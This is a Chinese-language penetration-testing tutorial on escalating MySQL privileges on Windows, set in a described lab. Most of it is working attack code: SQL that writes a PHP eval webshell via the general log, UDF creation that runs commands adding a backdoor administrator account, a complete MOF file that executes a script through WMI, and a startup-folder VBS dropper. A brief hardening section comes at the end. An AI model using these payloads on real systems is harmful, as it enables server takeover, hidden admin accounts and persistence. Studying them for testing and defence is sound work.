Windows下MySQL提权技术详解<\/h1>

一、实验环境准备<\/h2>

靶机A<\/strong>: Windows 7 SP1<\/li>
靶机B<\/strong>: Windows Server 2003 Enterprise x64<\/li>
环境搭建<\/strong>: Phpstudy (PHP 5.4.45 + MySQL 5.5.53)<\/li>

攻击前提<\/strong>: 已知root账号密码，网站存在phpmyadmin页面<\/li> <\/ul>
二、初始Webshell获取<\/h2>
1. 日志文件写Shell技术<\/h3>
当file_priv<\/code>为null无法使用into outfile<\/code>时，可采用日志文件写Shell：<\/p>
-- 开启日志记录 <\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log=<\/span>'on'<\/span>; <\/span><\/span> <\/span><\/span>-- 设置日志文件路径为Web目录 <\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log_file=<\/span>'C:\/phpstudy\/WWW\/hp.php'<\/span>; <\/span><\/span> <\/span><\/span>-- 写入PHP一句话木马 <\/span><\/span><\/span><\/span>select<\/span> '<?php @eval($_POST["hp"]);?>'<\/span>; <\/span><\/span> <\/span><\/span>-- 关闭日志记录 <\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log=<\/span>off<\/span>'; <\/span><\/span><\/span><\/code><\/pre>三、UDF提权技术<\/h2> 1. UDF提权原理<\/h3> UDF(User-Defined Function)是MySQL的扩展接口，允许用户创建自定义函数。通过创建调用系统命令的函数，可将MySQL权限提升至系统权限。<\/p> 2. 提权步骤<\/h3> (1) 导出UDF DLL文件<\/h4> 根据MySQL版本不同，DLL存放位置不同：<\/p> MySQL < 5.1<\/strong>: Windows 2003: c:\windows\system32<\/code><\/li> Windows 2000: c:\winnt\system32<\/code><\/li> <\/ul> <\/li> MySQL ≥ 5.1<\/strong>: MySQL安装目录下的lib\plugin<\/code>文件夹<\/li> <\/ul> 获取安装目录：<\/p> select<\/span> @@<\/span>basedir; <\/span><\/span><\/code><\/pre>(2) 创建自定义函数<\/h4> CREATE<\/span> FUNCTION<\/span> sys_eval RETURNS<\/span> STRING SONAME 'hpudf.dll'<\/span>; <\/span><\/span><\/code><\/pre>常用函数说明：<\/p> cmdshell<\/code>: 执行cmd命令<\/li> downloader<\/code>: 下载文件到指定目录<\/li> open3389<\/code>: 开启3389远程桌面<\/li> backshell<\/code>: 反弹Shell<\/li> ProcessView<\/code>: 枚举系统进程<\/li> KillProcess<\/code>: 终止指定进程<\/li> regread<\/code>: 读注册表<\/li> regwrite<\/code>: 写注册表<\/li> shut<\/code>: 关机\/注销\/重启<\/li> <\/ul> (3) 执行系统命令<\/h4> select<\/span> sys_eval('ipconfig'<\/span>); <\/span><\/span>select<\/span> sys_eval('net user hpdoger 123456 \/add'<\/span>); <\/span><\/span>select<\/span> sys_eval('net localgroup administrators hpdoger \/add'<\/span>); <\/span><\/span><\/code><\/pre>四、MOF提权技术<\/h2> 1. 提权条件<\/h3> Windows 2003及以下版本<\/li> MySQL启动身份具有读写c:\/windows\/system32\/wbem\/mof<\/code>目录权限<\/li> secure-file-priv<\/code>参数不为null<\/li> MySQL以root身份启动<\/li> <\/ul> 2. MOF文件原理<\/h3> 托管对象格式(MOF)文件位于c:\/windows\/system32\/wbem\/mof\/<\/code>，系统每5秒会执行一次其中的脚本。<\/p> 3. 利用代码<\/h3> #pragma namespace("\\\\.\\root\\subscription") <\/span><\/span><\/span><\/span> <\/span><\/span>instance of __EventFilter as $<\/span>EventFilter { <\/span><\/span> EventNamespace =<\/span> "Root<\/span>\\<\/span>Cimv2"<\/span>; <\/span><\/span> Name =<\/span> "filtP2"<\/span>; <\/span><\/span> Query =<\/span> "Select * From __InstanceModificationEvent "<\/span> <\/span><\/span> "Where TargetInstance Isa <\/span>\"<\/span>Win32_LocalTime<\/span>\"<\/span> "<\/span> <\/span><\/span> "And TargetInstance.Second = 5"<\/span>; <\/span><\/span> QueryLanguage =<\/span> "WQL"<\/span>; <\/span><\/span>}; <\/span><\/span> <\/span><\/span>instance of ActiveScriptEventConsumer as $<\/span>Consumer { <\/span><\/span> Name =<\/span> "consPCSV2"<\/span>; <\/span><\/span> ScriptingEngine =<\/span> "JScript"<\/span>; <\/span><\/span> ScriptText =<\/span> "var WSH = new ActiveXObject(<\/span>\"<\/span>WScript.Shell<\/span>\"<\/span>)<\/span>\n<\/span>"<\/span> <\/span><\/span> "WSH.run(<\/span>\"<\/span>net.exe user hpdoger 123456 \/add<\/span>\"<\/span>)"<\/span>; <\/span><\/span>}; <\/span><\/span> <\/span><\/span>instance of __FilterToConsumerBinding { <\/span><\/span> Consumer =<\/span> $<\/span>Consumer; <\/span><\/span> Filter =<\/span> $<\/span>EventFilter; <\/span><\/span>}; <\/span><\/span><\/code><\/pre>4. 提权步骤<\/h3> -- 使用dumpfile而非outfile，避免写入换行符 <\/span><\/span><\/span><\/span>select<\/span> load_file("C:\/test.mof"<\/span>) into<\/span> dumpfile "c:\/windows\/system32\/wbem\/mof\/nullevt.mof"<\/span>; <\/span><\/span><\/code><\/pre>5. 清除MOF提权<\/h3> net stop winmgmt <\/span><\/span>del<\/span> c:\/windows\/system32\/wbem\/repository <\/span><\/span>net start winmgmt <\/span><\/span><\/code><\/pre>五、启动项提权技术<\/h2> 1. 提权条件<\/h3> file_priv<\/code>不为null<\/li> 已知root密码<\/li> 需要服务器重启<\/li> <\/ul> 2. 提权POC<\/h3> create<\/span> table<\/span> a (cmd text); <\/span><\/span>insert<\/span> into<\/span> a values<\/span> ("set wshshell=createobject (""wscript.shell"") "<\/span>); <\/span><\/span>insert<\/span> into<\/span> a values<\/span> ("a=wshshell.run (""cmd.exe \/c net user hpdoger 123456 \/add"",0) "<\/span>); <\/span><\/span>insert<\/span> into<\/span> a values<\/span> ("b=wshshell.run (""cmd.exe \/c net localgroup administrators hpdoger \/add"",0) "<\/span>); <\/span><\/span>select<\/span> *<\/span> from<\/span> a into<\/span> outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"<\/span>; <\/span><\/span><\/code><\/pre>六、防御建议<\/h2> MySQL权限控制<\/strong>:<\/p> 避免使用root权限运行MySQL服务<\/li> 限制file_priv<\/code>权限<\/li> 设置secure-file-priv<\/code>参数<\/li> <\/ul> <\/li> 系统防护<\/strong>:<\/p> 监控system32\/wbem\/mof<\/code>目录异常文件<\/li> 检查启动项异常脚本<\/li> 定期审计系统用户和权限<\/li> <\/ul> <\/li> 配置加固<\/strong>:<\/p> 删除不必要的插件目录<\/li> 限制远程访问MySQL<\/li> 使用强密码策略<\/li> <\/ul> <\/li> 日志监控<\/strong>:<\/p> 监控MySQL异常查询<\/li> 审计文件创建和修改操作<\/li> <\/ul> <\/li> <\/ol> 七、总结<\/h2> 本文详细介绍了Windows环境下三种主要的MySQL提权技术：UDF提权、MOF提权和启动项提权。每种方法都有其特定的适用场景和限制条件，在实际渗透测试中需要根据目标环境选择合适的方法。同时，作为系统管理员，了解这些攻击技术有助于更好地防御此类提权攻击。<\/p>